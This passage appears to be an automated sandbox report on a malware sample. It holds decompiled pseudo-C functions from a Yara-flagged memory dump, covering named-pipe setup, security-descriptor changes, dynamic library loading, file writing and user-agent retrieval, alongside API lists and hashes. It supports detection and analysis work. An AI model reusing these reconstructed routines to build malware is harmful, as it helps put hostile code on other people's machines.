                                    					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                                    				}
                                    				E000885D5( &_v24);
                                    				return _t39;
                                    			}
















                                    APIs
                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
                                    • SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Security$Descriptor$ConvertInfoString
                                    • String ID:
                                    • API String ID: 3187949549-0
                                    • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                                    • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                                    • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                                    • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				char _v8;
                                    				char _t5;
                                    				struct HINSTANCE__* _t7;
                                    				void* _t10;
                                    				void* _t12;
                                    				void* _t22;
                                    				void* _t25;
                                    
                                    				_push(__ecx);
                                    				_t12 = __ecx;
                                    				_t22 = __edx;
                                    				_t5 = E000895C7(_a4);
                                    				_t25 = 0;
                                    				_v8 = _t5;
                                    				_push(_t5);
                                    				if(_a4 != 0x7c3) {
                                    					_t7 = LoadLibraryA(); // executed
                                    				} else {
                                    					_t7 = GetModuleHandleA();
                                    				}
                                    				if(_t7 != 0) {
                                    					_t10 = E0008E171(_t12, _t22, _t7); // executed
                                    					_t25 = _t10;
                                    				}
                                    				E000885C2( &_v8);
                                    				return _t25;
                                    			}











                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                                    • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 4133054770-0
                                    • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                                    • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                                    • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                                    • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                    				WCHAR* _v8;
                                    				char _v12;
                                    				char _v44;
                                    				char _v564;
                                    				char _v1084;
                                    				void* __esi;
                                    				void* _t23;
                                    				struct _SECURITY_ATTRIBUTES* _t25;
                                    				int _t27;
                                    				char _t32;
                                    				char _t38;
                                    				intOrPtr _t39;
                                    				void* _t40;
                                    				WCHAR* _t41;
                                    				void* _t54;
                                    				char* _t60;
                                    				char* _t63;
                                    				void* _t70;
                                    				WCHAR* _t71;
                                    				intOrPtr* _t73;
                                    
                                    				_t70 = __ecx;
                                    				_push(__ecx);
                                    				E0008B700(__edx,  &_v44, __eflags, __fp0);
                                    				_t52 = _t70;
                                    				if(E0008BB8D(_t70) == 0) {
                                    					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
                                    					_pop(_t54);
                                    					__eflags = _t23;
                                    					if(__eflags == 0) {
                                    						_t71 = E00082C64( &_v1084, __eflags);
                                    					} else {
                                    						E0008B012(_t54,  &_v564); // executed
                                    						_t32 = E0008109A(_t54, 0x375);
                                    						_push(0);
                                    						_v12 = _t32;
                                    						_push( &_v44);
                                    						_t60 = "\\";
                                    						_push(_t60);
                                    						_push(_t32);
                                    						_push(_t60);
                                    						_push( &_v564);
                                    						_push(_t60);
                                    						_t71 = E000892E5( &_v1084);
                                    						E000885D5( &_v12);
                                    					}
                                    				} else {
                                    					_t38 = E0008109A(_t52, 0x4e0);
                                    					 *_t73 = 0x104;
                                    					_v12 = _t38;
                                    					_t39 =  *0x9e684; // 0x12af8f0
                                    					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                                    					_t78 = _t40;
                                    					if(_t40 != 0) {
                                    						_t41 = E0008109A( &_v564, 0x375);
                                    						_push(0);
                                    						_v8 = _t41;
                                    						_push( &_v44);
                                    						_t63 = "\\";
                                    						_push(_t63);
                                    						_push(_t41);
                                    						_push(_t63);
                                    						_t71 = E000892E5( &_v564);
                                    						E000885D5( &_v8);
                                    					} else {
                                    						_t71 = E00082C64( &_v44, _t78);
                                    					}
                                    					E000885D5( &_v12);
                                    				}
                                    				_v8 = _t71;
                                    				_t25 = E0008B269(_t71);
                                    				if(_t25 == 0) {
                                    					_t27 = CreateDirectoryW(_t71, _t25); // executed
                                    					if(_t27 == 0 || E0008B269(_t71) == 0) {
                                    						E0008861A( &_v8, 0xfffffffe);
                                    						_t71 = _v8;
                                    					}
                                    				}
                                    				return _t71;
                                    			}
























                                    APIs
                                    • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDirectory
                                    • String ID:
                                    • API String ID: 4241100979-0
                                    • Opcode ID: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                                    • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                                    • Opcode Fuzzy Hash: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                                    • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E000831C2(void* __edx, void* __eflags) {
                                    				CHAR* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				void* _v20;
                                    				signed int _t10;
                                    				intOrPtr _t11;
                                    				intOrPtr _t12;
                                    				void* _t16;
                                    				intOrPtr _t18;
                                    				intOrPtr _t22;
                                    				intOrPtr _t28;
                                    				void* _t38;
                                    				CHAR* _t40;
                                    
                                    				_t38 = __edx;
                                    				_t28 =  *0x9e688; // 0xf0000
                                    				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                                    				_t40 = _t10;
                                    				_v8 = _t40;
                                    				if(_t40 != 0) {
                                    					_t11 = E00088604(0x80000); // executed
                                    					 *0x9e724 = _t11;
                                    					__eflags = _t11;
                                    					if(_t11 != 0) {
                                    						_t12 = E0008BD10(); // executed
                                    						_v16 = _t12;
                                    						__eflags = _t12;
                                    						if(_t12 != 0) {
                                    							_push(0xc);
                                    							_pop(0);
                                    							_v12 = 1;
                                    						}
                                    						_v20 = 0;
                                    						__eflags = 0;
                                    						asm("sbb eax, eax");
                                    						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                                    						 *0x9e674 = _t16;
                                    						__eflags = _t16 - 0xffffffff;
                                    						if(_t16 != 0xffffffff) {
                                    							E0008BC7A( &_v20, _t38); // executed
                                    							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
                                    							__eflags = _t18;
                                    							if(_t18 != 0) {
                                    								goto L12;
                                    							}
                                    							_t22 =  *0x9e684; // 0x12af8f0
                                    							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
                                    							_push(0xfffffffd);
                                    							goto L11;
                                    						} else {
                                    							 *0x9e674 = 0;
                                    							_push(0xfffffffe);
                                    							L11:
                                    							_pop(0);
                                    							L12:
                                    							E0008861A( &_v8, 0xffffffff);
                                    							return 0;
                                    						}
                                    					}
                                    					_push(0xfffffff5);
                                    					goto L11;
                                    				}
                                    				return _t10 | 0xffffffff;
                                    			}

















                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                                    • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                                    • Opcode Fuzzy Hash: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                                    • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00085AFF(intOrPtr __edx, void* __fp0) {
                                    				short _v30;
                                    				short _v32;
                                    				short _v34;
                                    				short _v36;
                                    				intOrPtr* _t22;
                                    				intOrPtr _t23;
                                    				signed int _t30;
                                    				intOrPtr _t38;
                                    				intOrPtr* _t40;
                                    				intOrPtr _t44;
                                    				intOrPtr _t45;
                                    				intOrPtr* _t46;
                                    				signed int _t47;
                                    				void* _t55;
                                    
                                    				_t55 = __fp0;
                                    				_t45 = __edx;
                                    				_t47 = 0;
                                    				_t22 = E00088604(0x14);
                                    				_t38 =  *0x9e688; // 0xf0000
                                    				_t46 = _t22;
                                    				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                                    					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                                    					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                                    					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                                    					_v30 = 0;
                                    					GetDriveTypeW( &_v36); // executed
                                    				}
                                    				 *_t46 = 2;
                                    				 *(_t46 + 4) = _t47;
                                    				_t23 =  *0x9e688; // 0xf0000
                                    				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                                    				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                                    				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                                    				if(_t40 == 0) {
                                    					L9:
                                    					if(E00082DCB() == 0) {
                                    						goto L11;
                                    					} else {
                                    						_t47 = _t47 | 0xffffffff;
                                    					}
                                    				} else {
                                    					_t45 =  *_t40;
                                    					_t30 = _t47;
                                    					if(_t45 == 0) {
                                    						goto L9;
                                    					} else {
                                    						_t44 =  *((intOrPtr*)(_t40 + 4));
                                    						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                                    							_t30 = _t30 + 1;
                                    							if(_t30 < _t45) {
                                    								continue;
                                    							} else {
                                    								goto L9;
                                    							}
                                    							goto L12;
                                    						}
                                    						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                                    							L11:
                                    							E00084D6D(_t46, _t45, _t55);
                                    						} else {
                                    							goto L9;
                                    						}
                                    					}
                                    				}
                                    				L12:
                                    				E0008A39E();
                                    				E0008A39E();
                                    				return _t47;
                                    			}


















                                    APIs
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateDriveHeapType
                                    • String ID:
                                    • API String ID: 414167704-0
                                    • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                                    • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                                    • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                                    • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E0008E450(void* __ecx, void* __edx) {
                                    				char _v8;
                                    				intOrPtr* _t5;
                                    				intOrPtr _t10;
                                    				intOrPtr* _t11;
                                    				void* _t12;
                                    
                                    				_push(__ecx);
                                    				_t5 =  *0x9e6b0; // 0x1400870
                                    				if( *_t5 == 0) {
                                    					_v8 = E000895C7(0x2a7);
                                    					 *0x9e788 = E000891A6(_t6, 0);
                                    					E000885C2( &_v8);
                                    					goto L4;
                                    				} else {
                                    					_v8 = 0x100;
                                    					_t10 = E00088604(0x101);
                                    					 *0x9e788 = _t10;
                                    					_t11 =  *0x9e6b0; // 0x1400870
                                    					_t12 =  *_t11(0, _t10,  &_v8); // executed
                                    					if(_t12 == 0) {
                                    						L4:
                                    						return 0;
                                    					} else {
                                    						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
                                    					}
                                    				}
                                    			}









                                    APIs
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                                      • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AgentAllocateFreeObtainStringUser
                                    • String ID:
                                    • API String ID: 471734292-0
                                    • Opcode ID: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                                    • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                                    • Opcode Fuzzy Hash: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                                    • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _t13;
                                    				void* _t21;
                                    				void* _t23;
                                    				void* _t26;
                                    
                                    				_t23 = __ecx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t26 = 0;
                                    				_v12 = __ecx;
                                    				_t21 = __edx;
                                    				if(_a4 == 0) {
                                    					L3:
                                    					_t13 = 1;
                                    				} else {
                                    					while(1) {
                                    						_v8 = _v8 & 0x00000000;
                                    						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                    							break;
                                    						}
                                    						_t26 = _t26 + _v8;
                                    						_t23 = _v12;
                                    						if(_t26 < _a4) {
                                    							continue;
                                    						} else {
                                    							goto L3;
                                    						}
                                    						goto L4;
                                    					}
                                    					_t13 = 0;
                                    				}
                                    				L4:
                                    				return _t13;
                                    			}










                                    APIs
                                    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                                    • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                                    • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                                    • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008A5F7(WCHAR* __ecx, long __edx) {
                                    				intOrPtr _t6;
                                    				long _t12;
                                    				void* _t13;
                                    
                                    				_t12 = __edx;
                                    				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                    				if(_t13 != 0xffffffff) {
                                    					if(_t12 == 4) {
                                    						_t6 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                                    					}
                                    					return _t13;
                                    				}
                                    				return 0;
                                    			}







                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                                    • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                                    • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                                    • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00083017() {
                                    				signed int _t4;
                                    				intOrPtr _t8;
                                    				void* _t11;
                                    
                                    				_t4 =  *0x9e688; // 0xf0000
                                    				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
                                    					L3:
                                    					return _t4 | 0xffffffff;
                                    				} else {
                                    					_t4 = E0008BB20(_t11);
                                    					if(_t4 != 0) {
                                    						goto L3;
                                    					} else {
                                    						AllocConsole();
                                    						_t8 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
                                    						return 0;
                                    					}
                                    				}
                                    			}







                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocConsole
                                    • String ID:
                                    • API String ID: 4167703944-0
                                    • Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                                    • Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
                                    • Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                                    • Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E0008A63B(WCHAR* __ecx) {
                                    				signed int _t5;
                                    
                                    				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                    				_t2 = _t5 + 1; // 0x1
                                    				asm("sbb ecx, ecx");
                                    				return _t5 &  ~_t2;
                                    			}





                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                                    • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                                    • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                                    • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00088604(long _a4) {
                                    				void* _t2;
                                    
                                    				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                                    				return _t2;
                                    			}





                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                                    • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                                    • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                                    • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008B269(WCHAR* __ecx) {
                                    
                                    				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                                    			}




                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                                    • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                                    • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                                    • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000885EF() {
                                    				void* _t1;
                                    
                                    				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                    				 *0x9e768 = _t1;
                                    				return _t1;
                                    			}





                                    APIs
                                    • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeap
                                    • String ID:
                                    • API String ID: 10892065-0
                                    • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                                    • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                                    • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                                    • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E0008F9BF(void* __edx) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _t26;
                                    				char _t27;
                                    				intOrPtr _t29;
                                    				void* _t31;
                                    				void* _t36;
                                    				char _t38;
                                    				intOrPtr _t39;
                                    				char _t42;
                                    				intOrPtr _t51;
                                    				intOrPtr _t52;
                                    				intOrPtr* _t63;
                                    				intOrPtr _t66;
                                    				char* _t67;
                                    				intOrPtr _t69;
                                    				char _t78;
                                    				void* _t81;
                                    				void* _t82;
                                    
                                    				_t26 =  *0x9e654; // 0x12afd20
                                    				_t27 = E00088604( *((intOrPtr*)(_t26 + 4)));
                                    				_v12 = _t27;
                                    				if(_t27 != 0) {
                                    					_t63 =  *0x9e654; // 0x12afd20
                                    					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                                    						E000886E1(_t27,  *_t63, 0x400);
                                    						_v8 = 0;
                                    						_t36 = E0008109A(_t63, 0x34a);
                                    						_t66 =  *0x9e688; // 0xf0000
                                    						_t72 =  !=  ? 0x67d : 0x615;
                                    						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                                    						_push(0);
                                    						_push(_t36);
                                    						_t67 = "\\";
                                    						_v24 = _t38;
                                    						_push(_t67);
                                    						_push(_t38);
                                    						_t39 =  *0x9e688; // 0xf0000
                                    						_push(_t67);
                                    						_v20 = E000892E5(_t39 + 0x1020);
                                    						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                                    						_v16 = _t42;
                                    						E000885D5( &_v24);
                                    						E000885D5( &_v20);
                                    						_t73 = _v16;
                                    						_t82 = _t81 + 0x3c;
                                    						_t69 = _v8;
                                    						if(_v16 != 0 && _t69 > 0x400) {
                                    							_t51 =  *0x9e654; // 0x12afd20
                                    							_t52 =  *((intOrPtr*)(_t51 + 4));
                                    							_t53 =  <  ? _t69 : _t52;
                                    							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                                    							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                                    							_t69 = _v8;
                                    							_t82 = _t82 + 0xc;
                                    						}
                                    						E0008861A( &_v16, _t69);
                                    						E0008861A( &_v20, 0xfffffffe);
                                    						_t27 = _v12;
                                    						_t81 = _t82 + 0x10;
                                    						_t63 =  *0x9e654; // 0x12afd20
                                    					}
                                    					_t78 = 0;
                                    					while(1) {
                                    						_t29 =  *0x9e688; // 0xf0000
                                    						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                                    						_t81 = _t81 + 0xc;
                                    						if(_t31 >= 0) {
                                    							break;
                                    						}
                                    						Sleep(1);
                                    						_t78 = _t78 + 1;
                                    						if(_t78 < 0x2710) {
                                    							_t27 = _v12;
                                    							_t63 =  *0x9e654; // 0x12afd20
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					E0008861A( &_v12, 0);
                                    				}
                                    				return 0;
                                    			}


























                                    APIs
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapSleep
                                    • String ID:
                                    • API String ID: 4201116106-0
                                    • Opcode ID: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                                    • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                                    • Opcode Fuzzy Hash: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                                    • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                                    				char _v8;
                                    				WCHAR* _v12;
                                    				signed int _v16;
                                    				WCHAR* _v20;
                                    				short _t30;
                                    				short _t33;
                                    				intOrPtr _t38;
                                    				intOrPtr _t43;
                                    				intOrPtr _t45;
                                    				short _t49;
                                    				void* _t52;
                                    				char _t71;
                                    				WCHAR* _t72;
                                    
                                    				_v16 = _v16 & 0x00000000;
                                    				_t71 = 0;
                                    				_v12 = __ecx;
                                    				_t49 = __edx;
                                    				_v8 = 0;
                                    				_t72 = E00088604(0x448);
                                    				_v20 = _t72;
                                    				_pop(_t52);
                                    				if(_t72 != 0) {
                                    					_t72[0x21a] = __edx;
                                    					_t72[0x21c] = _a8;
                                    					lstrcpynW(_t72, _v12, 0x200);
                                    					if(_t49 != 1) {
                                    						_t30 = E00088604(0x100000);
                                    						_t72[0x212] = _t30;
                                    						if(_t30 != 0) {
                                    							_t69 = _a4;
                                    							_t72[0x216] = 0x100000;
                                    							if(_a4 != 0) {
                                    								E000887EA(_t72, _t69);
                                    							}
                                    							L16:
                                    							return _t72;
                                    						}
                                    						L7:
                                    						if(_t71 != 0) {
                                    							E0008861A( &_v8, 0);
                                    						}
                                    						L9:
                                    						_t33 = _t72[0x218];
                                    						if(_t33 != 0) {
                                    							_t38 =  *0x9e684; // 0x12af8f0
                                    							 *((intOrPtr*)(_t38 + 0x30))(_t33);
